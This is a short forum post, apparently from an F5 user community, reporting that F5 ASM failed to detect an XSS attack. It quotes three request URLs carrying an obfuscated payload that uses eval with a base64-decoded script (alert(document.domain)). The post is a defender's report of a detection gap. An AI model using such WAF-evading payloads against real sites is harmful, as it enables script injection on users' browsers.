Nguyen_Viet_Dun
Jul 18, 2018Nimbostratus
F5 ASM Signature Could Not detect XSS Attack
We detect XSS Attack to Webserver. But F5 ASM could not detect with Eval command exectute
/AAAA?category=all&text=*/1:eval.call(0,atob(%27YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs=%27))})//
/AAA?category=all&text=*/1:eval.call(0,atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))%7D)//
/AAA?category=all&text=*/1:eval.call(0,atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))})//